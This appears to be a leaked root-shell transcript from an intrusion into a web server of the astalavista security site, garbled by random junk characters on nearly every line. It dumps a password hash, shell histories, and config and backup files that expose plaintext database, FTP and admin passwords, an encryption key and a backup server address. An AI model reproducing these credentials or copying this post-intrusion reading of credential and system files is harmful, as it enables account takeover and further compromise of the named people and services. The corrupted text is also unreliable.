5 y S# a2 f' m; uastanet 1$YniJLAr.$NKtPNNGK9mcmz3/mLMSWC1:14235:0:99999:7:::. Y% H) X+ ^8 ]
" x3 u3 Y! j4 t/ E: C6 ?7 S- Z8 gsh-3.2# cat /etc/motd
, P/ z/ W! @* Q0 e* ^1 U1 P#####################################################6 q% O P9 G3 Q' [+ M! w* ^
#____ ____ ___ ____ _ ____ _ _ _ ____ ___ ____ #
9 O- Q5 ]- O; V2 h0 m: ^: V* ?# |__| [__ | |__| | |__| | | | [__ | |__| #: V0 w7 Y3 }4 O |/ B( n3 ?) s
# | | ___] | | | |___ | | \/ | ___] | | | #0 m+ t9 q S" T8 N+ S( \5 B, R
# #8 F: F3 H+ e. V- O+ m1 O3 g
#####################################################
4 @1 N( i1 S f" l5 v& Q# #0 }' a- W4 G$ q# V
# Admin Contact - 链接标记support@secureservertech.com #3 k1 x3 f+ G4 m/ ^/ l- F/ I
# #
, C3 ^" C$ e( l* ^2 c) t# Available ShortCuts #9 G1 c9 Y" f' r# ]
# #- \0 A: Z0 x0 a2 Z
# nst - list active connections #
# T9 t5 I1 S: Z& D4 }# ddos - shows how many times each ip is connected #
) B7 k7 U. O" D: u* z+ Y; i# ltr - restart the webserver #3 L9 f) t0 D p8 J
# phpc - edit the php config file #5 Z% l3 D. }; \) J2 ]* u& h# l
# htc - edit the webserver configuration file #
! x% [' I, M* J+ |8 `# up - uptime #
9 G2 c4 |7 ?' I3 R1 y# etd - edit the motd of the day file #3 m* n) V3 d8 E1 \
# htr - start and restart apache if needed #
" b" J* _% P7 K7 h4 r4 d# syng - shows active SYN_RECV connections #8 a, t7 x. @1 P' P
# synd - syn flood blocker - “synd -h” for usage #
! H, C* H5 [" U1 @#####################################################
- k- G/ c- o' E' ]# NOTES: #
# I3 X% z5 H8 ^" t* c% k( m# Last Upgrade - 12-08-2008 by JF #) T' F ]1 t) M) u8 W; G6 k% e3 e
# My.cnf/Mysql Optimization - 1-28-09 #. C0 T' q$ S! J6 C
# #* U5 T( C; e( p$ O
# # q; \7 ^ `6 n U1 h+ l$ s$ O
# #
" L" l. D; G+ b4 v; c% U' I##################################################### C3 e& z0 |9 {1 t
3 d6 f7 j% T. \1 m3 c$ g7 psh-3.2# lastlog | grep -v Never
0 @0 q/ [5 }9 P e% I8 `) dUsername Port From Latest
3 U0 q* I2 X. `/ r1 D4 hroot pts/1 adsl-194-162-fix Thu Jun 4 07:19:14 +0000 2009' _$ M/ _/ c1 I
admin pts/1 cp.secureservert Thu Mar 20 10:25:39 +0000 2008
8 K. A' ~* M, `+ J! L& lcom pts/0 cust.static.212- Tue Jun 2 07:46:30 +0000 2009- ?& a/ V4 h6 `, x- d# a4 o+ P
astanet pts/0 adsl-194-162-fix Thu Apr 16 08:20:44 +0000 2009# R" |! U$ Q1 D0 l
2 w3 \" s0 M; _ n; z2 f$ ?4 v0 Vsh-3.2# ls -la8 f; G! d$ m. b8 P, }( [9 b0 v4 T
total 4533765 d. R- m1 N) S2 s
drwxr-x— 15 root root 4096 Jun 4 08:40 .
1 Z5 o/ `5 ]& }2 ?drwxr-xr-x 25 root root 4096 Jun 3 02:43 ..8 x4 w, g3 k. E; V3 c
-rw-r–r– 1 root root 2394400 Oct 19 2007 10mbtest.zip( ^8 l( \; j/ D; F. t
-rw——- 1 root root 1006 Sep 11 2007 anaconda-ks.cfg$ ^1 Y# R5 ~+ v
-rw——- 1 root root 16836 Jun 4 07:21 .bash_history
% q" ^3 L, k2 c: q4 k$ d( ^' B2 y-rw-r–r– 1 root root 24 Jan 6 2007 .bash_logout
5 J6 n4 B F+ B4 @4 |* z. I-rw-r–r– 1 root root 191 Jan 6 2007 .bash_profile
+ f! h2 l) `# y1 y3 m, y$ Z+ l) \-rw-r–r– 1 root root 176 Jan 6 2007 .bashrc
9 N4 n9 i; h; r9 u& j: i-rwx—— 1 root root 1899 Oct 28 2007 bk.sh
0 M( I! j8 b1 `2 ^-rw-r–r– 1 root root 1327 Nov 29 2007 cert
8 |4 j. U" @# j-rw-r–r– 1 root root 139860821 May 14 2008 contrexxbackup_20080514.sql& t' z4 o! M6 o5 C8 {
drwxr-xr-x 4 root root 4096 May 20 2008 .cpan
% k8 w$ U) o1 {7 }# t-rw-r–r– 1 root root 100 Jan 6 2007 .cshrc
/ ?8 x( z5 x! C8 k! m-rw-r–r– 1 root root 323079 Mar 31 13:48 defaultp_ports.sql
; }8 H) m j) V* wdrwx—— 2 root root 4096 Oct 28 2007 .elinks
4 P, G! N) o* S5 s! v; Q3 o1 g2 Fdrwxr-xr-x 13 root root 4096 Mar 21 2008 gdb-6.7.1/ l, _2 d6 z& P Z# _
-rw-r–r– 1 root root 15080950 Oct 29 2007 gdb-6.7.1.tar.bz2: V! c$ w# [! y" {5 K, |
-rw——- 1 root root 0 Apr 16 13:19 .history( f0 e. G4 a& `. g3 x
-rw-r–r– 1 root root 16095 Sep 11 2007 install.log8 l5 i3 I9 C' I
-rw-r–r– 1 root root 2566 Sep 11 2007 install.log.syslog% k$ A0 z& a# i2 S2 `* t
-rw-r–r– 1 root root 1003 Jul 22 2007 install.sh
: m9 X l* w$ |+ E( O0 W-rw——- 1 root root 35 Jun 2 14:23 .lesshst
# k. @% i$ q6 V) g0 A+ @drwxr-xr-x 2 root root 4096 Dec 29 2007 .lftp
( Z0 @1 a! O' q8 U& D( {0 A0 F# Fdrwxr-xr-x 10 root root 4096 Sep 14 2007 linux-2.6.19.2-grsec6 P/ Y5 D ]( Y0 J3 r
-rw-r–r– 1 root root 94979336 Feb 16 2007 linux-2.6.19.2-grsec.tar.gz1 G& k! W# h2 @ `) V- t. e: z% ?2 d- W
-rw-r–r– 1 root root 4737058 Sep 22 2007 linux-2.6.22.tar.bz24 H5 h+ N. [& _& R
-rwx—— 1 root root 760 Sep 18 2008 lp3 M% R/ B: n7 W7 Z8 K- \+ c# C
drwxr-xr-x 12 root root 4096 Nov 30 2007 lsws-3.3.1
5 a# f9 X8 ~; L. y-rw-r–r– 1 root root 2480045 Nov 30 2007 lsws-3.3.1-ent-x86_64-linux.tar.gz5 T. c7 J7 M4 W) N4 w9 {
-rw-r–r– 1 root root 6388501 Nov 29 2007 lsws-3.3.1-ent-x86_64-linux.tar.gz.1
3 E! @$ o( E7 Vdrwxr-xr-x 12 root root 4096 Mar 21 2008 lsws-3.3.9
2 L/ H7 p2 m, j2 b7 E5 r5 P-rw-r–r– 1 root root 6437577 Mar 21 2008 lsws-3.3.9-ent-x86_64-linux.tar.gz H; U2 a+ ?5 |' W8 L6 i5 n8 A' H
drwxr-xr-x 12 root root 4096 May 29 15:10 lsws-4.0.33 K# B) A$ V* n( n
-rw-r–r– 1 root root 6496050 May 8 05:59 lsws-4.0.3-ent-x86_64-linux.tar.gz
/ b+ X) ~; |8 D1 @+ k0 s6 X7 f P-rw-r–r– 1 root root 25316 Feb 15 2006 mybk.sh- B( g# {& V1 r& e2 M
-rw——- 1 root root 41 Oct 19 2007 .my.cnf4 L7 ?- b& t3 v6 F& v. Z e: y
-rw——- 1 root root 2902 Jun 4 08:40 .mysql_history. G& h- m1 A. {, a- x. j
-rwx—— 1 root root 38873 Apr 16 2008 mysqlreport* U# g) \! ]) o8 \ U0 O; {0 U
-rw——- 1 root root 41 May 20 2008 .mytop
- d7 c3 [! d: P9 u4 Z. J3 Q2 {! ldrwxr-xr-x 3 1000 1000 4096 May 20 2008 mytop-1.6
+ z& e7 I; Z( x' Q: j' S- M) O-rw-r–r– 1 root root 19720 Feb 17 2007 mytop-1.6.tar.gz; ]% V8 T# L8 ?( Y6 I$ S
drwxr-xr-x 2 root root 4096 Oct 28 2007 .ncftp
2 r' U# ]( b) l! V2 _$ |-rw——- 1 root root 1462 Sep 21 2007 opt.php% b2 U5 {( W, p; i; _& M1 S8 ~. j+ i
-rw-r–r– 1 root root 3371 Sep 22 2007 p
. D) | G* W1 F' E2 e# n-rw-r–r– 1 root root 7608429 Aug 30 2007 php-5.2.4.tar.bz2
! m8 W) E2 j1 q+ R-rw——- 1 root root 1024 Feb 3 21:32 .rnd8 V) ?) q$ Z# C& ?* x( Y0 u
-rw-r–r– 1 root root 716 Nov 28 2007 server.csr2 W9 }6 o" d7 o: T6 y
-rw-r–r– 1 root root 887 Nov 28 2007 server.key
# A& L$ m# B+ o- l5 D' `; P$ Y& ]drwx—— 2 root root 4096 Oct 10 2008 .ssh! W. y+ {- V) P6 v. h
-rw-r–r– 1 root root 44227 Oct 28 2007 tar-inc-backup.dat2 V! r( E( I) M5 E" n; C
-rw-r–r– 1 root root 129 Jan 6 2007 .tcshrc
# r5 Z7 i. U) k! f# }( \6 z-rw-r–r– 1 root root 104874307 Oct 17 2007 test100.zip: b0 C" S( v$ d( M
-rw-r–r– 1 root root 67085540 Oct 19 2007 test100.zip.1
9 ^; B. R" G( s) N- Qdrwxr-xr-x 2 root root 4096 Apr 29 11:15 tmp8 a+ M* x1 P* K' b; v
-rw-r–r– 1 root root 42596 May 21 2007 tuning-primer.sh C3 w7 r2 f. N( Q, t
drwxrwxrwx 19 1000 users 4096 Mar 21 2008 valgrind-3.3.0
{3 K& g, F1 R P% S. @6 j- G-rw-r–r– 1 root root 4519551 Dec 11 2007 valgrind-3.3.0.tar.bz2
% F7 n7 n$ p1 n# Q( G# i-rw——- 1 root root 12997 May 16 2008 .viminfo0 Q1 ~, ?. ?8 I) d1 n1 P5 L
$ W# e# H, g# w. U( U
sh-3.2# cat .bash_history: p5 w* ` m% h4 m, {/ I/ n
[snip]
. B* S0 a# |' o: L, @2 owget cp4sst.com/sstlinux.tar.gz: g! w0 X' F8 L! G
tar zxvf sstlinux.tar.gz# O; p! a; [4 \ I* s" Y
cd linux-2.6.27.10
5 t" W0 s! _" }3 psh install.sh
& a7 e/ v" G' q. P& \6 ^make bzImage ; make modules ; make modules_install ; make install; r4 f8 T+ r8 H2 }# o' _- \- c1 F
make clean" o* L( I0 f9 d; s
service mysqld restart7 }' K! o! \8 i7 E3 T' S
[snip]1 f* s. v4 T4 U' b. w4 A5 ?! ?
cd /usr/sbin/1 T9 F# f) H0 O0 F* T
chmod 4777 traceroute
, n- ]% Y; m" fchmod 4777 ping1 e; g: }. V6 b1 f4 c2 \
traceroute -I 链接标记[url]www.astalavista.ch[/url]
3 n7 l2 w J, X& s6 I' _( S8 m[snip]0 n' U+ S" s" d6 s/ X9 t
vi /etc/csf/csf.conf
( ^9 D! N3 U1 j% _7 {traceroute google.ch
; E3 i1 j( ]1 J/ r( R, Tservice csf restart
4 y: _- p: X z% E1 mtracert google.ch
: |, N% X, |5 @7 Pservice csf restart
8 x' s& J- M- R2 l# `& g/ ]traceroute 链接标记[url]www.google.ch[/url]
) b: J; i y8 Qtracert 链接标记[url]www.google.ch[/url]7 X# G" ?7 A; I. H8 N2 C
traceroute 链接标记[url]www.google.ch[/url]6 ^& ?/ o) \$ E3 O( V
locate traceroute
, q/ U5 g) m( x1 V0 U- w' uchown 4755 /bin/traceroute0 Y% [: N% u2 k: x0 h7 J0 T! n
chown 4777 /bin/traceroute4 P0 g5 n1 o: v4 x
locate ping* |& g5 N5 r2 f) l
chown 4755 /bin/ping! h+ h$ {9 H+ T! D( y; N' X+ m
chown 4777 /bin/ping
4 }# j: l* }! Q" L& m( N0 lcd /bin/; ` ?" B# M0 g8 N
ls -ali | grep ping
2 A4 D0 a9 S0 Z; v+ U7 f+ K$ ochown root ping: _: m# n1 I7 W; i
chmod 4755 ping
4 r) L( E/ S* g' v( Pls -ali | grep traceroute, G- Z3 h: y8 r0 Y. R
chown root traceroute* G( @, ~ o5 V1 P# S
chmod 4755 traceroute! g/ ?9 |9 \7 l# N; x% S
ls -ali | grep traceroute
) u' {* t% k+ Y1 xtraceroute -I 链接标记[url]www.google.ch[/url]
( k- F6 E# x9 M1 e; ~traceroute 链接标记[url]www.google.ch[/url]9 f$ Y3 n0 _& N _/ g4 F" ^# V5 h
whois pmsantos.ch! S1 u. B* X$ b4 r: U& f* z& J/ B
[snip]' Y- [+ ?; v4 e! a% M( E+ K
mysql -h com_contrexx2_live < /root/defaultp_ports.sql
' f2 Q; K8 j" h4 J5 G amysql -h -ucontrexxuser2 -p0fEYNZgXz1pKe com_contrexx2_live < /root/defaultp_ports.sql
" }* o$ T3 j [4 A" D- _) B! Hmysql -h -u contrexxuser2 -p com_contrexx2_live < /root/defaultp_ports.sql" H1 f& B& U# \" @! [7 l
mysql -h localhost com_contrexx2_live < /root/defaultp_ports.sql
' C+ F# D4 U# h* W$ {! f$ q0 \+ htop. F! H( l0 r, L
ping ssth.ch! C ?- q0 W; _( s1 Y& `
ping asdlkfaljgasd???ljg???lasj.ch+ p3 ]; V% a- n
ping asdlkfaljgasdlasj.ch
( p! a4 [$ ]6 `$ d" q+ bping 链接标记[url]www.ssth.ch[/url]0 }' ^% e8 T; o) G
ping ssth.ch+ I2 o( Z/ G8 S4 |0 V
nslookup 链接标记[url]www.google.ch[/url]
& {* P1 `5 R' n! M" jnslookup 链接标记[url]www.ssth.ch[/url]
5 [9 D1 ~6 }+ }man nslookup3 ?7 Z/ w, _2 y! j* r$ r* X
ping 链接标记[url]www.google.ch[/url]- O( q1 h9 C7 L8 q9 B7 e Y, h
nslookup 链接标记[url]www.google.ch[/url]
( J. c* [6 m$ O; B% bnslookup 链接标记[url]www.google.ch[/url]& ~7 Y3 _. p o: `
nslookup salfjasdlf.ch
7 o) S- O/ ~, }- ^& |. L# W7 E[snip]% G0 i) F$ _9 L4 h! j5 @1 h
openssl passwd -1 sadf
; r7 v [3 V6 w! kopenssl passwd -1 5cZNHstdTy
# P6 {. y2 N) L5 E2 T$ S, F7 L4 l/ smysql2 T: Y- E+ @5 \4 y4 R1 u; `8 v
mysql' `) C( c* b5 u3 Z* J4 y
locate proftp3 O3 _) b, M: _+ \3 S; S
vi /etc/proftpd.passwd
' @* k. V2 u3 r# F3 y. Uservice proftpd restart1 z* U A2 A- O' p h1 G
locate proftpd.conf6 t+ r3 U4 U+ `
vi /etc/proftpd.conf
7 c# J7 @9 h+ h7 lvi /etc/proftpd.passwd
6 A8 i" d, @4 r" P! [service proftpd restart8 M+ d1 ]6 ~$ `- K
[snip]
, T; v' v8 g+ s9 W+ k9 d/bin/sh /home/com/backup_system/backup.sh! i2 }# m$ Y& b9 E) U: y0 c
tar cfv /home/com/backups/09-04-28_backup.tar /home/com/public_html/admin* }' w% _: ^# G2 q+ J- S s
mysqldump -h localhost -u contrexxuser2 –password=0fEYNZgXz1pKe com_contrexx2_live > 09-04-29-com_contrexx2_live-full.sql
x& {; e: |+ g* K9 Y5 ymysqldump -h localhost -u contrexxuser2 –password=0fEYNZgXz1pKe com_contrexx2 > 09-04-29-com_contrexx2-full.sql7 v2 M5 R" o5 X" L
ls -ali2 s& D% [; |+ ~) H
mysqldump -h localhost -u com_user1 –password=Undv7gu29gvb5ikhS com_contrexx > 07-04-29-com_contrexx-full.sql' e" K" V) H+ A5 }" j
mysqldump -h localhost -u com_user1 –password=Undv7gu29gvb5ikhS ideapool > 07-04-29-ideapool-full.sql& l4 U, l. Y+ x' l, C
crontab -l
( u. I7 b- X0 b. w' C0 lcrontab -l0 `6 w S2 H6 e7 U% w( m
php -q /home/com/public_html/modifications/cronjobs/securitynews.php" r' f. v/ X t& O. B
/home/com/public_html/modifications/cronjobs/exploits.sh6 E7 ~- X5 Z& A
wget 链接标记[url]http://www.litespeedtech.com/pac ... x86_64-linux.tar.gz[/url]
6 c1 |1 C8 w. z6 Ntar zxvf lsws-4.0.3-ent-x86_64-linux.tar.gz' T0 \- w" ], ]$ \0 u
cd lsws-4.0.3" v0 }) M6 R. e, v/ X
sh install.sh
k2 ?$ n) _4 b: Nuptime
+ r8 ]. X4 z J7 ?1 T5 Ghdparm -tt /dev/sda
1 l, `" Q% J5 n X& Y( M @iostat
( t8 F4 ]5 n8 T, G( l- }/ H- ?0 L- xyum install iostat. b1 h3 U) g% C% @
iostat% m1 j5 l- X" L q/ u5 q4 z+ b1 w8 b
whereis iostat
) V" ~9 Z7 X# \# e8 s# cyjm clean all
! q) _2 V% h0 y& J( Iyum clean all ; yum -y update
" B/ c7 }5 ?3 v- L- u* Oiostat4 N( m/ n) i3 i1 p- y2 y
yum install systat& [/ Z6 U$ z1 @+ h& `
rpm -qa | grep iostat: N0 j" w8 A7 ?, T* v7 @
rpm -qa | grep sysstat
2 [4 D1 t0 Z6 qrpm -qa | grep systat
, W2 l. ~& ?8 B T, n0 Vdmesg -c- V8 C3 @. H; U8 s8 M# |9 t' u
sysctl -p7 Q$ H2 L4 t2 Y( G8 j! n0 S
uname -r7 J( P$ O: Q+ ?0 q& F: I0 Z2 J' E
cd /usr/src9 K0 G: [! y9 j1 w) b5 n) E5 H
wget nix101.com/kernels/sstlinux.tar.gz
. I/ T2 t9 {! i3 Z f( I4 R- Vshutdown -r now
+ s( I1 I1 {8 M- g* D/ bnano -w /boot/grub/grub.conf
! {& D& U" ]0 B8 o
* \( E3 M" P8 esh-3.2# cat .my.cnf+ Z$ f) G8 O3 O1 X+ l3 g
[client]
- _4 B) \/ j$ n' u4 P) Uuser=da_admin
8 G$ H/ {+ l9 T& t5 jpassword=X9dctmRH% f7 u6 o# P* D
% p1 i5 \& C/ h# z9 @sh-3.2# cat /home/com/backup_system/backup.sh
$ n! X) t" s0 T- A/ v$ H/ d3 \ y#!/bin/sh5 E1 N( Z: }: }% v. T
##################################################################### |, H6 `3 i- g) x: Q- r+ D% S
# #
$ J; ]) Y0 L. l1 |: y# incremental backup for astalavista.com #
- q" o# c8 z) @2 H: b# #
- ^) m$ b: }" O& H& ?' Q6 _# author: Paulo M. Santos <链接标记paulo.santos@astalavista.com> #( _* r6 s) ]6 Y% o+ D/ d5 x
# #
2 c! u# j/ B5 ]4 u# @1 g7 ^' B#####################################################################: K3 |6 s8 }9 l* C" |
[snip]* ~% y! V+ z1 K0 R
PROG_DIR=”/home/com/backup_system”;, I) }9 f4 j7 H6 o, \" m0 w
BACKUP_DIR=”/home/com/backups”;5 k3 _& a" F4 `- h6 B4 y% p) P
DOBACKUP_FROM=”/home/com/domains/astalavista.com/public_html”;. o: A% X1 a( y: }
# ftp for synology backup server, {( D# `+ k& } U
FTP_HOST=”212.254.194.163″;
0 X' F1 j4 y/ `2 _% w1 ?: H5 SFTP_PORT=”21″; b/ \+ W' ~3 |) \
FTP_USER=”astalavista.com”;
: ^; P3 y- R6 ~" t( V& `FTP_PASS=”yWHOJbzpWTWC6Xrmg1WnfBk5V”;' }5 t. |% x* M5 I
FTP_DIR=”/astalavista.com”;/ U! X) P& t5 Z h8 Y+ t
# database
7 q5 _: u; Z5 z: w. @8 T' _! W# ?DB_HOST=”localhost”;
4 o+ U: j2 b) UDB_USER=”contrexxuser2″;0 [1 m, c4 p2 b; \
DB_PASS=”0fEYNZgXz1pKe”;
: @6 c* |0 y" m1 Z1 T0 W9 f6 KDB_DATABASE1=”com_contrexx2_live”;
* o& L& I0 o: Y8 eDB_DATABASE2=”com_contrexx2″;" P# S$ R. C3 Z5 P' O. p
[snip]
r3 J3 S3 S" ~! gftp -in $FTP_HOST $FTP_PORT <<EOF+ m7 H* D4 m( g! x
quote USER $FTP_USER
$ d4 M j* N) {5 j0 P: kquote PASS $FTP_PASS1 @3 S+ Z8 F2 u5 n0 a% s
cd $FTP_DIR8 T. [* L1 ?6 n/ g
put $DB_FULLNAME-SQL_Dump.tar' b0 Y: ^" M3 Q( R- b) d8 ^- b
put $BACKUP_FULLNAME-Public_HTML.tar
) ?3 G% F/ }0 n0 t: [( V" _/ Qclose
/ o% o& `" R9 N. Q) \bye
$ ^$ K8 O& n- S' IEOF
7 E% u t( q. k2 B; u( f! I' D( c
( d. c& j% P. N4 Wsh-3.2# cd /home
/ e3 c8 {1 M# ?sh-3.2# ls -la9 n; z4 D' v) o6 j7 c, C
total 120
3 M5 n3 |+ Z" R! ^, w. wdrwxr-xr-x 14 root root 4096 Mar 11 17:56 .
: ~' P( i% w: F9 B ddrwxr-xr-x 25 root root 4096 Jun 3 02:43 ..9 ?& C8 i& d% l, z8 X+ K& @7 v
drwx–x–x 9 admin admin 4096 Nov 28 2007 admin6 ~$ Z S$ A9 Y x9 Y4 U
-rw——- 1 root root 8192 Jun 4 03:03 aquota.group& g4 b! N5 s7 w
-rw——- 1 root root 8192 Jun 3 02:45 aquota.user
2 ^5 _- R0 M3 E# `/ h: `3 ?drwx–x–x 6 astanet astanet 4096 Jun 4 09:51 astanet# Q8 T& X6 b8 h& ?; x8 X" S7 ]
drwxr-xr-x 2 root root 4096 Jul 29 2008 backup
, y, X% s; Y6 s3 B, h3 Tdrwxr-xr-x 2 root root 4096 Sep 17 2008 backup.14161+ ]8 t" N' I9 p$ C6 Y9 E" P
drwx–x–x 10 com com 4096 Apr 28 12:40 com' Z8 P8 s( z+ n/ P: r% S' f) k
drwxr-xr-x 2 root root 4096 May 17 2007 ftp2 l/ J0 q1 o I8 g Q: Y8 c5 U
drwx—— 3 jon jon 4096 Sep 21 2007 jon* f8 F5 Y3 V# a7 W
drwx—— 2 root root 16384 Sep 11 2007 lost+found( z9 D% s" j3 n
drwxr-xr-x 2 root root 4096 Sep 14 2007 my! ~7 Y, S4 y2 s8 _. K
drwxr-xr-x 5 mysql mysql 4096 Sep 24 2007 mysqldata
0 f N2 c, o- m4 c# b( edrwx—— 2 jon jon 4096 Sep 15 2007 test3 r( M, s: _4 K1 E' O* X
drwxrwxrwt 2 root root 4096 Jul 29 2008 tmp
5 g: i; P' t4 m# V, G
/ U& t2 @8 D; Ssh-3.2# cd admin
$ H6 F! `% ^$ L# K" X$ B6 ?* C+ Qsh-3.2# ls -la- z" _" s+ ~( w2 y, I& M- c
total 1735896
: m% C) M8 Q' ]drwx–x–x 9 admin admin 4096 Nov 28 2007 .
1 {3 C- T1 ]7 l! n4 [ o; Bdrwxr-xr-x 14 root root 4096 Mar 11 17:56 ..$ z+ T! v4 V& [! B( f( E3 g4 G
drwxrwxr-x 2 admin admin 4096 Oct 25 2007 admin_backups
9 m9 x- m9 Q+ u8 c% J$ O. c; @drwx—— 2 admin admin 4096 Sep 28 2007 backups9 ^& ?, M5 j7 Y
-rw——- 1 admin admin 860 Sep 17 2008 .bash_history
% S h" D' P# }( {) Q( b0 e-rw-r–r– 1 admin admin 24 Sep 14 2007 .bash_logout
, P. ?$ R: O, D% f( r-rw-r–r– 1 admin admin 176 Sep 14 2007 .bash_profile
7 G; M$ U: F. J& }, E- Z-rw-r–r– 1 admin admin 124 Sep 14 2007 .bashrc$ d$ ]& u# h: i' U- k6 M( m/ `. o
drwxr-xr-x 2 root root 4096 Sep 28 2007 com_backups
: Z& S$ T5 o$ `2 Ddrwx–x–x 6 admin admin 4096 Sep 21 2007 domains
9 u2 V* r, W8 xdrwxrwx— 3 admin mail 4096 Sep 21 2007 imap+ x# P. _# O" R$ J- P$ s/ k [
-rw-r–r– 1 root root 24 Sep 21 2007 info.php
" k8 Z/ M! ^5 ~, Y2 cdrwx—— 2 admin admin 4096 Sep 21 2007 mail
( `! ]" N1 o, G' f; L/ n* H-rw-r–r– 1 root root 716 Nov 28 2007 server.csr6 S3 U0 O2 |" }; r, j1 p- h
-rw-r–r– 1 root root 887 Nov 28 2007 server.key6 ~3 T+ i: C7 L S
-rw-r—– 1 admin mail 34 Sep 14 2007 .shadow
+ I+ k) ~) m* a7 f8 o# }-rw-r—– 1 admin com 1775711054 Oct 25 2007 user.admin.com.tar.gz
6 X* Z& Q3 `6 ]2 k/ ?9 s/ r5 }" ]drwx–x–x 2 admin admin 4096 Jul 29 2008 user_backups
* s( z" i) Q* z0 W& ]; T9 k3 h7 h
3 _1 }* ~. B; i. P* u% u& Jsh-3.2# ..: g s' {3 X/ f: D$ Y( l
sh-3.2# cd jon
& p a$ e' k# T) l" zsh-3.2# ls -la2 [+ _, g, l6 ~5 O% K, r1 V8 }- }
total 36
9 F. P9 Z" F. X' X1 S e" ~, Rdrwx—— 3 jon jon 4096 Sep 21 2007 .8 H; f3 }* X2 H
drwxr-xr-x 14 root root 4096 Mar 11 17:56 ..
0 w' ^3 b( f2 i-rw——- 1 jon jon 53 Sep 21 2007 .bash_history8 f0 u L3 v" ]
-rw-r–r– 1 jon jon 24 Sep 21 2007 .bash_logout+ B) _# `6 t' |2 B/ b( t+ \
-rw-r–r– 1 jon jon 176 Sep 21 2007 .bash_profile
/ E6 z3 ]+ G. G-rw-r–r– 1 jon jon 124 Sep 21 2007 .bashrc" n/ v; Q/ _8 f7 L& k
-rw-r–r– 1 root root 24 Sep 21 2007 info.php
4 a3 ~9 c4 z: _5 D- idrwxrwxr-x 2 jon jon 4096 Sep 21 2007 public_html) o: [4 Y. j* o& g; b
* F, M v9 ]8 L( C0 y
sh-3.2# cd ... Q) B0 [# z7 Y' U
sh-3.2# cd test' M X/ b2 { s5 @+ F
sh-3.2# ls -la
3 n8 y+ x/ T0 S, p* s( qtotal 48 q1 z6 x7 @. F" F# J9 R. m
drwx—— 2 jon jon 4096 Sep 15 2007 .6 Q) D+ O7 F4 `, `
drwxr-xr-x 14 root root 4096 Mar 11 17:56 ..
1 t9 s! b$ I: y; u' b. e( n-rw——- 1 jon jon 79 Sep 21 2007 .bash_history+ W3 d; x/ L6 ]# X( E# T
-rw-r–r– 1 jon jon 24 Sep 15 2007 .bash_logout6 u, J( N: [5 L/ k" }3 D% y% h% W4 j
-rw-r–r– 1 jon jon 176 Sep 15 2007 .bash_profile
4 c8 _1 O4 c \' R- y& R9 @/ Q-rw-r–r– 1 jon jon 124 Sep 15 2007 .bashrc3 B( G- c6 x# x, I1 j
sh-3.2# cat .bash_history
* j/ o; S7 ^" |* `; f2 N) q+ h# g3 O/usr/bin/mysqladmin -u root password PoliuJhytg67$ U4 _3 M0 V& _$ o4 Y# S
0 s# v- W$ _/ r+ S' e o2 l$ A0 S" V; m
sh-3.2# cd ..
& F% B7 U+ X. ]0 e4 o* l. U' g; Gsh-3.2# cd astanet+ t$ \$ _" F/ X- Q* z% h, e
sh-3.2# ls -la
: t) P5 h) A9 R4 Vtotal 52 E/ i/ B6 y) @' S
drwx–x–x 6 astanet astanet 4096 Jun 4 09:51 .
, k2 K, Z2 y4 s- p2 |- Edrwxr-xr-x 14 root root 4096 Mar 11 17:56 ..
g8 a! @- U& J0 x# _& M* bdrwxr-xr-x 2 root root 4096 Dec 23 16:00 auth+ a( g3 a& c6 Q8 T* l, I3 h
-rw——- 1 astanet astanet 3892 Apr 16 12:14 .bash_history
7 D4 B" U* _) c- G7 y-rw-r–r– 1 astanet astanet 33 Dec 17 21:50 .bash_logout
$ v6 J7 I! t+ m' Y: l/ p-rw-r–r– 1 astanet astanet 176 Dec 17 21:50 .bash_profile* e8 y5 `4 t) f2 {9 l& n P3 y! |
-rw-r–r– 1 astanet astanet 124 Dec 17 21:50 .bashrc
- p" ]/ B6 z! l# E% d5 zdrwx–x–x 3 astanet astanet 4096 Dec 23 12:18 domains8 Y# L% c9 N" }6 _
drwxrwx— 3 astanet mail 4096 Dec 23 12:18 imap. h4 b1 p0 C/ p! Z# t0 e3 o
drwx—— 2 astanet astanet 4096 Dec 23 12:18 mail$ a6 V& j- E r7 n! v, L
-rw——- 1 astanet astanet 197 Jun 4 09:51 .mysql_history
: R) v6 v) F' C. S/ Alrwxrwxrwx 1 astanet astanet 37 Dec 23 12:18 public_html -> ./domains/astalavista.net/public_html% I O* S0 `3 l3 x8 V
-rw-r—– 1 astanet mail 34 Dec 22 12:41 .shadow5 k. G) i L ]3 g3 v; F: |
6 p4 E6 T) l N% ]& K0 F7 T R0 Osh-3.2# cd auth/
- j* p. I' m' `& Y* J2 Msh-3.2# ls -la& c& }" }, J% V; B+ t
total 289 C% Z9 f8 H) p5 O2 Z, D
drwxr-xr-x 2 root root 4096 Dec 23 16:00 .! ~) B7 F- |/ n+ y5 v; X! {
drwx–x–x 6 astanet astanet 4096 Jun 4 09:51 ..
: J r+ f, x* w' q7 `' @5 Z-rw-r–r– 1 root root 321 Jan 5 2006 hackercontest.config.inc.php
8 V' ^7 M8 e8 ^5 T; k& s0 L5 |/ N-rw-r–r– 1 root root 319 Jan 5 2006 hosting.config.inc.php0 y/ r4 `/ R& O* T6 \. e9 ]
-rw-r–r– 1 root root 24 Jun 4 09:38 .htadm_pwd* K$ R/ g. p9 A# h5 |5 u( @) k
-rw-r–r– 1 root root 49 Jan 5 2006 .htpasswd_newhosting
; V: x. J! [0 R$ x-rw-r–r– 1 root root 51 Oct 11 2006 .htwebalizer_pwd
4 ?1 F% r- A! {9 X) J- z
/ l% E" V1 R; H0 z: Y* G) [sh-3.2# cat hackercontest.config.inc.php
% _1 T5 `9 t& D<?PHP
4 P6 q: |) V' B4 Z// Variabeln f?r Verbindung zur Datenbank //, h9 G1 b3 M1 e0 j% T* Q8 q+ ^
$conxHost = ‘localhost’; // MySQL hostname
( _; w+ M; G( w9 ^# k$ l$conxUser = ‘hackercontest’; // MySQL user- I; c& J+ i# r7 u* S
$conxPassword = ‘K6m@7dUc’; // MySQL password
8 {0 h0 a% V& L& l7 F, w4 N" w9 Z$bfkey = ‘cXvB3981′; // Encryption/Decryption Key for Blowfish& |( F+ p1 J: @5 d$ C! k4 r
?>) ~1 }" Q, n: v, Q$ s# }
sh-3.2# cat hosting.config.inc.php4 h& y" j, ?$ q: h/ J' s. \5 W. [; V0 h) C
<?PHP
+ E. Y: [& W1 ^ Y9 \: R7 q: l// Variabeln f?r Verbindung zur Datenbank //* z5 [6 l; R4 `) b1 W% u6 w' p
$conxHost = ‘localhost’; // MySQL hostname9 T6 b, ]# ?; R. t, e7 q3 a$ G+ `
$conxUser = ‘hostinguser’; // MySQL user& U3 ^- p6 z6 F+ s; p
